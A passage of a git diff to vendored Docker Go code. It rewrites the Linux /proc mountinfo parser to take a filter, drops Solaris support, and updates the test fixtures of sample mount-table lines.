+				opt = clean(opt)
+				if !has(wantedOpts, opt) && !has(pOpts, opt) {
+					t.Errorf("unexpected mount option %q, expected %q", opt, opts)
+				}
+				delete(wantedOpts, opt)
+			}
+		}
+		for opt := range wantedOpts {
+			t.Errorf("missing mount option %q, found %q", opt, mi.Opts)
+		}
+
+		// Validate Optional
+		if mi.Optional != "" {
+			for _, field := range strings.Split(mi.Optional, ",") {
+				field = clean(field)
+				if !has(wantedOptional, field) && !has(pOptional, field) {
+					t.Errorf("unexpected optional field %q, expected %q", field, optional)
+				}
+				delete(wantedOptional, field)
+			}
+		}
+		for field := range wantedOptional {
+			t.Errorf("missing optional field %q, found %q", field, mi.Optional)
+		}
+
+		// Validate VFS if set
+		if vfs != "" {
+			if mi.VfsOpts != "" {
+				for _, opt := range strings.Split(mi.VfsOpts, ",") {
+					opt = clean(opt)
+					if !has(wantedVFS, opt) && opt != "seclabel" { // can be added by selinux
+						t.Errorf("unexpected vfs option %q, expected %q", opt, vfs)
+					}
+					delete(wantedVFS, opt)
+				}
+			}
+			for opt := range wantedVFS {
+				t.Errorf("missing vfs option %q, found %q", opt, mi.VfsOpts)
+			}
+		}
+
+		return
+	}
+
+	t.Errorf("failed to find mount %q", mnt)
+}
+
+// clean strips off any value param after the colon
+func clean(v string) string {
+	return strings.SplitN(v, ":", 2)[0]
+}
+
+// has returns true if key is a member of m
+func has(m map[string]struct{}, key string) bool {
+	_, ok := m[key]
+	return ok
+}
diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go b/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go
deleted file mode 100644
index c684aa81fc..0000000000
--- a/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go
+++ /dev/null
@@ -1,33 +0,0 @@
-// +build solaris,cgo
-
-package mount
-
-import (
-	"golang.org/x/sys/unix"
-	"unsafe"
-)
-
-// #include <stdlib.h>
-// #include <stdio.h>
-// #include <sys/mount.h>
-// int Mount(const char *spec, const char *dir, int mflag,
-// char *fstype, char *dataptr, int datalen, char *optptr, int optlen) {
-//     return mount(spec, dir, mflag, fstype, dataptr, datalen, optptr, optlen);
-// }
-import "C"
-
-func mount(device, target, mType string, flag uintptr, data string) error {
-	spec := C.CString(device)
-	dir := C.CString(target)
-	fstype := C.CString(mType)
-	_, err := C.Mount(spec, dir, C.int(flag), fstype, nil, 0, nil, 0)
-	C.free(unsafe.Pointer(spec))
-	C.free(unsafe.Pointer(dir))
-	C.free(unsafe.Pointer(fstype))
-	return err
-}
-
-func unmount(target string, flag int) error {
-	err := unix.Unmount(target, flag)
-	return err
-}
diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go
index a2a3bb457f..1428dffa52 100644
--- a/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go
+++ b/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go
@@ -1,6 +1,6 @@
-// +build !linux,!freebsd,!solaris freebsd,!cgo solaris,!cgo
+// +build !linux,!freebsd freebsd,!cgo
 
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 func mount(device, target, mType string, flag uintptr, data string) error {
 	panic("Not implemented")
diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo.go
index e3fc3535e9..ecd03fc022 100644
--- a/vendor/github.com/docker/docker/pkg/mount/mountinfo.go
+++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo.go
@@ -1,4 +1,4 @@
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 // Info reveals information about a particular mounted filesystem. This
 // struct is populated from the content in the /proc/<pid>/mountinfo file.
diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go
index 4f32edcd90..36c89dc1a2 100644
--- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go
+++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go
@@ -1,4 +1,4 @@
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 /*
 #include <sys/param.h>
@@ -15,7 +15,7 @@ import (
 
 // Parse /proc/self/mountinfo because comparing Dev and ino does not work from
 // bind mounts.
-func parseMountTable() ([]*Info, error) {
+func parseMountTable(filter FilterFunc) ([]*Info, error) {
 	var rawEntries *C.struct_statfs
 
 	count := int(C.getmntinfo(&rawEntries, C.MNT_WAIT))
@@ -32,10 +32,24 @@ func parseMountTable() ([]*Info, error) {
 	var out []*Info
 	for _, entry := range entries {
 		var mountinfo Info
+		var skip, stop bool
 		mountinfo.Mountpoint = C.GoString(&entry.f_mntonname[0])
+
+		if filter != nil {
+			// filter out entries we're not interested in
+			skip, stop = filter(p)
+			if skip {
+				continue
+			}
+		}
+
 		mountinfo.Source = C.GoString(&entry.f_mntfromname[0])
 		mountinfo.Fstype = C.GoString(&entry.f_fstypename[0])
+
 		out = append(out, &mountinfo)
+		if stop {
+			break
+		}
 	}
 	return out, nil
 }
diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go
index be69fee1d7..c1dba01fc3 100644
--- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go
+++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go
@@ -1,86 +1,123 @@
-// +build linux
-
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 import (
 	"bufio"
 	"fmt"
 	"io"
 	"os"
+	"strconv"
 	"strings"
 )
 
-const (
-	/* 36 35 98:0 /mnt1 /mnt2 rw,noatime master:1 - ext3 /dev/root rw,errors=continue
-	   (1)(2)(3)   (4)   (5)      (6)      (7)   (8) (9)   (10)         (11)
+func parseInfoFile(r io.Reader, filter FilterFunc) ([]*Info, error) {
+	s := bufio.NewScanner(r)
+	out := []*Info{}
+	for s.Scan() {
+		if err := s.Err(); err != nil {
+			return nil, err
+		}
+		/*
+		   36 35 98:0 /mnt1 /mnt2 rw,noatime master:1 - ext3 /dev/root rw,errors=continue
+		   (1)(2)(3)   (4)   (5)      (6)      (7)   (8) (9)   (10)         (11)
 
-	   (1) mount ID:  unique identifier of the mount (may be reused after umount)
-	   (2) parent ID:  ID of parent (or of self for the top of the mount tree)
-	   (3) major:minor:  value of st_dev for files on filesystem
-	   (4) root:  root of the mount within the filesystem
-	   (5) mount point:  mount point relative to the process's root
-	   (6) mount options:  per mount options
-	   (7) optional fields:  zero or more fields of the form "tag[:value]"
-	   (8) separator:  marks the end of the optional fields
-	   (9) filesystem type:  name of filesystem of the form "type[.subtype]"
-	   (10) mount source:  filesystem specific information or "none"
-	   (11) super options:  per super block options*/
-	mountinfoFormat = "%d %d %d:%d %s %s %s %s"
-)
+		   (1) mount ID:  unique identifier of the mount (may be reused after umount)
+		   (2) parent ID:  ID of parent (or of self for the top of the mount tree)
+		   (3) major:minor:  value of st_dev for files on filesystem
+		   (4) root:  root of the mount within the filesystem
+		   (5) mount point:  mount point relative to the process's root
+		   (6) mount options:  per mount options
+		   (7) optional fields:  zero or more fields of the form "tag[:value]"
+		   (8) separator:  marks the end of the optional fields
+		   (9) filesystem type:  name of filesystem of the form "type[.subtype]"
+		   (10) mount source:  filesystem specific information or "none"
+		   (11) super options:  per super block options
+		*/
 
-// Parse /proc/self/mountinfo because comparing Dev and ino does not work from
-// bind mounts
-func parseMountTable() ([]*Info, error) {
-	f, err := os.Open("/proc/self/mountinfo")
-	if err != nil {
-		return nil, err
-	}
-	defer f.Close()
+		text := s.Text()
+		fields := strings.Split(text, " ")
+		numFields := len(fields)
+		if numFields < 10 {
+			// should be at least 10 fields
+			return nil, fmt.Errorf("Parsing '%s' failed: not enough fields (%d)", text, numFields)
+		}
 
-	return parseInfoFile(f)
-}
+		p := &Info{}
+		// ignore any numbers parsing errors, as there should not be any
+		p.ID, _ = strconv.Atoi(fields[0])
+		p.Parent, _ = strconv.Atoi(fields[1])
+		mm := strings.Split(fields[2], ":")
+		if len(mm) != 2 {
+			return nil, fmt.Errorf("Parsing '%s' failed: unexpected minor:major pair %s", text, mm)
+		}
+		p.Major, _ = strconv.Atoi(mm[0])
+		p.Minor, _ = strconv.Atoi(mm[1])
 
-func parseInfoFile(r io.Reader) ([]*Info, error) {
-	var (
-		s   = bufio.NewScanner(r)
-		out = []*Info{}
-	)
+		p.Root = fields[3]
+		p.Mountpoint = fields[4]
+		p.Opts = fields[5]
 
-	for s.Scan() {
-		if err := s.Err(); err != nil {
-			return nil, err
+		var skip, stop bool
+		if filter != nil {
+			// filter out entries we're not interested in
+			skip, stop = filter(p)
+			if skip {
+				continue
+			}
 		}
 
-		var (
-			p              = &Info{}
-			text           = s.Text()
-			optionalFields string
-		)
-
-		if _, err := fmt.Sscanf(text, mountinfoFormat,
-			&p.ID, &p.Parent, &p.Major, &p.Minor,
-			&p.Root, &p.Mountpoint, &p.Opts, &optionalFields); err != nil {
-			return nil, fmt.Errorf("Scanning '%s' failed: %s", text, err)
+		// one or more optional fields, when a separator (-)
+		i := 6
+		for ; i < numFields && fields[i] != "-"; i++ {
+			switch i {
+			case 6:
+				p.Optional = fields[6]
+			default:
+				/* NOTE there might be more optional fields before the such as
+				   fields[7]...fields[N] (where N < sepIndex), although
+				   as of Linux kernel 4.15 the only known ones are
+				   mount propagation flags in fields[6]. The correct
+				   behavior is to ignore any unknown optional fields.
+				*/
+				break
+			}
 		}
-		// Safe as mountinfo encodes mountpoints with spaces as \040.
-		index := strings.Index(text, " - ")
-		postSeparatorFields := strings.Fields(text[index+3:])
-		if len(postSeparatorFields) < 3 {
-			return nil, fmt.Errorf("Error found less than 3 fields post '-' in %q", text)
+		if i == numFields {
+			return nil, fmt.Errorf("Parsing '%s' failed: missing separator ('-')", text)
 		}
 
-		if optionalFields != "-" {
-			p.Optional = optionalFields
+		// There should be 3 fields after the separator...
+		if i+4 > numFields {
+			return nil, fmt.Errorf("Parsing '%s' failed: not enough fields after a separator", text)
 		}
+		// ... but in Linux <= 3.9 mounting a cifs with spaces in a share name
+		// (like "//serv/My Documents") _may_ end up having a space in the last field
+		// of mountinfo (like "unc=//serv/My Documents"). Since kernel 3.10-rc1, cifs
+		// option unc= is ignored,  so a space should not appear. In here we ignore
+		// those "extra" fields caused by extra spaces.
+		p.Fstype = fields[i+1]
+		p.Source = fields[i+2]
+		p.VfsOpts = fields[i+3]
 
-		p.Fstype = postSeparatorFields[0]
-		p.Source = postSeparatorFields[1]
-		p.VfsOpts = strings.Join(postSeparatorFields[2:], " ")
 		out = append(out, p)
+		if stop {
+			break
+		}
 	}
 	return out, nil
 }
 
+// Parse /proc/self/mountinfo because comparing Dev and ino does not work from
+// bind mounts
+func parseMountTable(filter FilterFunc) ([]*Info, error) {
+	f, err := os.Open("/proc/self/mountinfo")
+	if err != nil {
+		return nil, err
+	}
+	defer f.Close()
+
+	return parseInfoFile(f, filter)
+}
+
 // PidMountInfo collects the mounts for a specific process ID. If the process
 // ID is unknown, it is better to use `GetMounts` which will inspect
 // "/proc/self/mountinfo" instead.
@@ -91,5 +128,5 @@ func PidMountInfo(pid int) ([]*Info, error) {
 	}
 	defer f.Close()
 
-	return parseInfoFile(f)
+	return parseInfoFile(f, nil)
 }
diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go
index bd100e1d49..64411ccaef 100644
--- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go
+++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go
@@ -1,71 +1,73 @@
 // +build linux
 
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 import (
 	"bytes"
 	"testing"
+
+	"gotest.tools/assert"
 )
 
 const (
 	fedoraMountinfo = `15 35 0:3 / /proc rw,nosuid,nodev,noexec,relatime shared:5 - proc proc rw
-    16 35 0:14 / /sys rw,nosuid,nodev,noexec,relatime shared:6 - sysfs sysfs rw,seclabel
-    17 35 0:5 / /dev rw,nosuid shared:2 - devtmpfs devtmpfs rw,seclabel,size=8056484k,nr_inodes=2014121,mode=755
-    18 16 0:15 / /sys/kernel/security rw,nosuid,nodev,noexec,relatime shared:7 - securityfs securityfs rw
-    19 16 0:13 / /sys/fs/selinux rw,relatime shared:8 - selinuxfs selinuxfs rw
-    20 17 0:16 / /dev/shm rw,nosuid,nodev shared:3 - tmpfs tmpfs rw,seclabel
-    21 17 0:10 / /dev/pts rw,nosuid,noexec,relatime shared:4 - devpts devpts rw,seclabel,gid=5,mode=620,ptmxmode=000
-    22 35 0:17 / /run rw,nosuid,nodev shared:21 - tmpfs tmpfs rw,seclabel,mode=755
-    23 16 0:18 / /sys/fs/cgroup rw,nosuid,nodev,noexec shared:9 - tmpfs tmpfs rw,seclabel,mode=755
-    24 23 0:19 / /sys/fs/cgroup/systemd rw,nosuid,nodev,noexec,relatime shared:10 - cgroup cgroup rw,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd
-    25 16 0:20 / /sys/fs/pstore rw,nosuid,nodev,noexec,relatime shared:20 - pstore pstore rw
-    26 23 0:21 / /sys/fs/cgroup/cpuset rw,nosuid,nodev,noexec,relatime shared:11 - cgroup cgroup rw,cpuset,clone_children
-    27 23 0:22 / /sys/fs/cgroup/cpu,cpuacct rw,nosuid,nodev,noexec,relatime shared:12 - cgroup cgroup rw,cpuacct,cpu,clone_children
-    28 23 0:23 / /sys/fs/cgroup/memory rw,nosuid,nodev,noexec,relatime shared:13 - cgroup cgroup rw,memory,clone_children
-    29 23 0:24 / /sys/fs/cgroup/devices rw,nosuid,nodev,noexec,relatime shared:14 - cgroup cgroup rw,devices,clone_children
-    30 23 0:25 / /sys/fs/cgroup/freezer rw,nosuid,nodev,noexec,relatime shared:15 - cgroup cgroup rw,freezer,clone_children
-    31 23 0:26 / /sys/fs/cgroup/net_cls rw,nosuid,nodev,noexec,relatime shared:16 - cgroup cgroup rw,net_cls,clone_children
-    32 23 0:27 / /sys/fs/cgroup/blkio rw,nosuid,nodev,noexec,relatime shared:17 - cgroup cgroup rw,blkio,clone_children
-    33 23 0:28 / /sys/fs/cgroup/perf_event rw,nosuid,nodev,noexec,relatime shared:18 - cgroup cgroup rw,perf_event,clone_children
-    34 23 0:29 / /sys/fs/cgroup/hugetlb rw,nosuid,nodev,noexec,relatime shared:19 - cgroup cgroup rw,hugetlb,clone_children
-    35 1 253:2 / / rw,relatime shared:1 - ext4 /dev/mapper/ssd-root--f20 rw,seclabel,data=ordered
-    36 15 0:30 / /proc/sys/fs/binfmt_misc rw,relatime shared:22 - autofs systemd-1 rw,fd=38,pgrp=1,timeout=300,minproto=5,maxproto=5,direct
-    37 17 0:12 / /dev/mqueue rw,relatime shared:23 - mqueue mqueue rw,seclabel
-    38 35 0:31 / /tmp rw shared:24 - tmpfs tmpfs rw,seclabel
-    39 17 0:32 / /dev/hugepages rw,relatime shared:25 - hugetlbfs hugetlbfs rw,seclabel
-    40 16 0:7 / /sys/kernel/debug rw,relatime shared:26 - debugfs debugfs rw
-    41 16 0:33 / /sys/kernel/config rw,relatime shared:27 - configfs configfs rw
-    42 35 0:34 / /var/lib/nfs/rpc_pipefs rw,relatime shared:28 - rpc_pipefs sunrpc rw
-    43 15 0:35 / /proc/fs/nfsd rw,relatime shared:29 - nfsd sunrpc rw
-    45 35 8:17 / /boot rw,relatime shared:30 - ext4 /dev/sdb1 rw,seclabel,data=ordered
-    46 35 253:4 / /home rw,relatime shared:31 - ext4 /dev/mapper/ssd-home rw,seclabel,data=ordered
-    47 35 253:5 / /var/lib/libvirt/images rw,noatime,nodiratime shared:32 - ext4 /dev/mapper/ssd-virt rw,seclabel,discard,data=ordered
-    48 35 253:12 / /mnt/old rw,relatime shared:33 - ext4 /dev/mapper/HelpDeskRHEL6-FedoraRoot rw,seclabel,data=ordered
-    121 22 0:36 / /run/user/1000/gvfs rw,nosuid,nodev,relatime shared:104 - fuse.gvfsd-fuse gvfsd-fuse rw,user_id=1000,group_id=1000
-    124 16 0:37 / /sys/fs/fuse/connections rw,relatime shared:107 - fusectl fusectl rw
-    165 38 253:3 / /tmp/mnt rw,relatime shared:147 - ext4 /dev/mapper/ssd-root rw,seclabel,data=ordered
-    167 35 253:15 / /var/lib/docker/devicemapper/mnt/aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,relatime shared:149 - ext4 /dev/mapper/docker-253:2-425882-aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,seclabel,discard,stripe=16,data=ordered
-    171 35 253:16 / /var/lib/docker/devicemapper/mnt/c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,relatime shared:153 - ext4 /dev/mapper/docker-253:2-425882-c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,seclabel,discard,stripe=16,data=ordered
-    175 35 253:17 / /var/lib/docker/devicemapper/mnt/1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,relatime shared:157 - ext4 /dev/mapper/docker-253:2-425882-1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,seclabel,discard,stripe=16,data=ordered
-    179 35 253:18 / /var/lib/docker/devicemapper/mnt/d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,relatime shared:161 - ext4 /dev/mapper/docker-253:2-425882-d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,seclabel,discard,stripe=16,data=ordered
-    183 35 253:19 / /var/lib/docker/devicemapper/mnt/6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,relatime shared:165 - ext4 /dev/mapper/docker-253:2-425882-6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,seclabel,discard,stripe=16,data=ordered
-    187 35 253:20 / /var/lib/docker/devicemapper/mnt/8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,relatime shared:169 - ext4 /dev/mapper/docker-253:2-425882-8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,seclabel,discard,stripe=16,data=ordered
-    191 35 253:21 / /var/lib/docker/devicemapper/mnt/c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,relatime shared:173 - ext4 /dev/mapper/docker-253:2-425882-c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,seclabel,discard,stripe=16,data=ordered
-    195 35 253:22 / /var/lib/docker/devicemapper/mnt/2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,relatime shared:177 - ext4 /dev/mapper/docker-253:2-425882-2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,seclabel,discard,stripe=16,data=ordered
-    199 35 253:23 / /var/lib/docker/devicemapper/mnt/37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,relatime shared:181 - ext4 /dev/mapper/docker-253:2-425882-37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,seclabel,discard,stripe=16,data=ordered
-    203 35 253:24 / /var/lib/docker/devicemapper/mnt/aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,relatime shared:185 - ext4 /dev/mapper/docker-253:2-425882-aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,seclabel,discard,stripe=16,data=ordered
-    207 35 253:25 / /var/lib/docker/devicemapper/mnt/928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,relatime shared:189 - ext4 /dev/mapper/docker-253:2-425882-928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,seclabel,discard,stripe=16,data=ordered
-    211 35 253:26 / /var/lib/docker/devicemapper/mnt/0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,relatime shared:193 - ext4 /dev/mapper/docker-253:2-425882-0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,seclabel,discard,stripe=16,data=ordered
-    215 35 253:27 / /var/lib/docker/devicemapper/mnt/d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,relatime shared:197 - ext4 /dev/mapper/docker-253:2-425882-d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,seclabel,discard,stripe=16,data=ordered
-    219 35 253:28 / /var/lib/docker/devicemapper/mnt/bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,relatime shared:201 - ext4 /dev/mapper/docker-253:2-425882-bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,seclabel,discard,stripe=16,data=ordered
-    223 35 253:29 / /var/lib/docker/devicemapper/mnt/7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,relatime shared:205 - ext4 /dev/mapper/docker-253:2-425882-7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,seclabel,discard,stripe=16,data=ordered
-    227 35 253:30 / /var/lib/docker/devicemapper/mnt/c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,relatime shared:209 - ext4 /dev/mapper/docker-253:2-425882-c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,seclabel,discard,stripe=16,data=ordered
-    231 35 253:31 / /var/lib/docker/devicemapper/mnt/8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,relatime shared:213 - ext4 /dev/mapper/docker-253:2-425882-8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,seclabel,discard,stripe=16,data=ordered
-    235 35 253:32 / /var/lib/docker/devicemapper/mnt/1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,relatime shared:217 - ext4 /dev/mapper/docker-253:2-425882-1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,seclabel,discard,stripe=16,data=ordered
-    239 35 253:33 / /var/lib/docker/devicemapper/mnt/e9aa60c60128cad1 rw,relatime shared:221 - ext4 /dev/mapper/docker-253:2-425882-e9aa60c60128cad1 rw,seclabel,discard,stripe=16,data=ordered
-    243 35 253:34 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,relatime shared:225 - ext4 /dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,seclabel,discard,stripe=16,data=ordered
-    247 35 253:35 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,relatime shared:229 - ext4 /dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,seclabel,discard,stripe=16,data=ordered
-    31 21 0:23 / /DATA/foo_bla_bla rw,relatime - cifs //foo/BLA\040BLA\040BLA/ rw,sec=ntlm,cache=loose,unc=\\foo\BLA BLA BLA,username=my_login,domain=mydomain.com,uid=12345678,forceuid,gid=12345678,forcegid,addr=10.1.30.10,file_mode=0755,dir_mode=0755,nounix,rsize=61440,wsize=65536,actimeo=1`
+16 35 0:14 / /sys rw,nosuid,nodev,noexec,relatime shared:6 - sysfs sysfs rw,seclabel
+17 35 0:5 / /dev rw,nosuid shared:2 - devtmpfs devtmpfs rw,seclabel,size=8056484k,nr_inodes=2014121,mode=755
+18 16 0:15 / /sys/kernel/security rw,nosuid,nodev,noexec,relatime shared:7 - securityfs securityfs rw
+19 16 0:13 / /sys/fs/selinux rw,relatime shared:8 - selinuxfs selinuxfs rw
+20 17 0:16 / /dev/shm rw,nosuid,nodev shared:3 - tmpfs tmpfs rw,seclabel
+21 17 0:10 / /dev/pts rw,nosuid,noexec,relatime shared:4 - devpts devpts rw,seclabel,gid=5,mode=620,ptmxmode=000
+22 35 0:17 / /run rw,nosuid,nodev shared:21 - tmpfs tmpfs rw,seclabel,mode=755
+23 16 0:18 / /sys/fs/cgroup rw,nosuid,nodev,noexec shared:9 - tmpfs tmpfs rw,seclabel,mode=755
+24 23 0:19 / /sys/fs/cgroup/systemd rw,nosuid,nodev,noexec,relatime shared:10 - cgroup cgroup rw,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd
+25 16 0:20 / /sys/fs/pstore rw,nosuid,nodev,noexec,relatime shared:20 - pstore pstore rw
+26 23 0:21 / /sys/fs/cgroup/cpuset rw,nosuid,nodev,noexec,relatime shared:11 - cgroup cgroup rw,cpuset,clone_children
+27 23 0:22 / /sys/fs/cgroup/cpu,cpuacct rw,nosuid,nodev,noexec,relatime shared:12 - cgroup cgroup rw,cpuacct,cpu,clone_children
+28 23 0:23 / /sys/fs/cgroup/memory rw,nosuid,nodev,noexec,relatime shared:13 - cgroup cgroup rw,memory,clone_children
+29 23 0:24 / /sys/fs/cgroup/devices rw,nosuid,nodev,noexec,relatime shared:14 - cgroup cgroup rw,devices,clone_children
+30 23 0:25 / /sys/fs/cgroup/freezer rw,nosuid,nodev,noexec,relatime shared:15 - cgroup cgroup rw,freezer,clone_children
+31 23 0:26 / /sys/fs/cgroup/net_cls rw,nosuid,nodev,noexec,relatime shared:16 - cgroup cgroup rw,net_cls,clone_children
+32 23 0:27 / /sys/fs/cgroup/blkio rw,nosuid,nodev,noexec,relatime shared:17 - cgroup cgroup rw,blkio,clone_children
+33 23 0:28 / /sys/fs/cgroup/perf_event rw,nosuid,nodev,noexec,relatime shared:18 - cgroup cgroup rw,perf_event,clone_children
+34 23 0:29 / /sys/fs/cgroup/hugetlb rw,nosuid,nodev,noexec,relatime shared:19 - cgroup cgroup rw,hugetlb,clone_children
+35 1 253:2 / / rw,relatime shared:1 - ext4 /dev/mapper/ssd-root--f20 rw,seclabel,data=ordered
+36 15 0:30 / /proc/sys/fs/binfmt_misc rw,relatime shared:22 - autofs systemd-1 rw,fd=38,pgrp=1,timeout=300,minproto=5,maxproto=5,direct
+37 17 0:12 / /dev/mqueue rw,relatime shared:23 - mqueue mqueue rw,seclabel
+38 35 0:31 / /tmp rw shared:24 - tmpfs tmpfs rw,seclabel
+39 17 0:32 / /dev/hugepages rw,relatime shared:25 - hugetlbfs hugetlbfs rw,seclabel
+40 16 0:7 / /sys/kernel/debug rw,relatime shared:26 - debugfs debugfs rw
+41 16 0:33 / /sys/kernel/config rw,relatime shared:27 - configfs configfs rw
+42 35 0:34 / /var/lib/nfs/rpc_pipefs rw,relatime shared:28 - rpc_pipefs sunrpc rw
+43 15 0:35 / /proc/fs/nfsd rw,relatime shared:29 - nfsd sunrpc rw
+45 35 8:17 / /boot rw,relatime shared:30 - ext4 /dev/sdb1 rw,seclabel,data=ordered
+46 35 253:4 / /home rw,relatime shared:31 - ext4 /dev/mapper/ssd-home rw,seclabel,data=ordered
+47 35 253:5 / /var/lib/libvirt/images rw,noatime,nodiratime shared:32 - ext4 /dev/mapper/ssd-virt rw,seclabel,discard,data=ordered
+48 35 253:12 / /mnt/old rw,relatime shared:33 - ext4 /dev/mapper/HelpDeskRHEL6-FedoraRoot rw,seclabel,data=ordered
+121 22 0:36 / /run/user/1000/gvfs rw,nosuid,nodev,relatime shared:104 - fuse.gvfsd-fuse gvfsd-fuse rw,user_id=1000,group_id=1000
+124 16 0:37 / /sys/fs/fuse/connections rw,relatime shared:107 - fusectl fusectl rw
+165 38 253:3 / /tmp/mnt rw,relatime shared:147 - ext4 /dev/mapper/ssd-root rw,seclabel,data=ordered
+167 35 253:15 / /var/lib/docker/devicemapper/mnt/aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,relatime shared:149 - ext4 /dev/mapper/docker-253:2-425882-aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,seclabel,discard,stripe=16,data=ordered
+171 35 253:16 / /var/lib/docker/devicemapper/mnt/c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,relatime shared:153 - ext4 /dev/mapper/docker-253:2-425882-c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,seclabel,discard,stripe=16,data=ordered
+175 35 253:17 / /var/lib/docker/devicemapper/mnt/1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,relatime shared:157 - ext4 /dev/mapper/docker-253:2-425882-1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,seclabel,discard,stripe=16,data=ordered
+179 35 253:18 / /var/lib/docker/devicemapper/mnt/d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,relatime shared:161 - ext4 /dev/mapper/docker-253:2-425882-d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,seclabel,discard,stripe=16,data=ordered
+183 35 253:19 / /var/lib/docker/devicemapper/mnt/6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,relatime shared:165 - ext4 /dev/mapper/docker-253:2-425882-6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,seclabel,discard,stripe=16,data=ordered
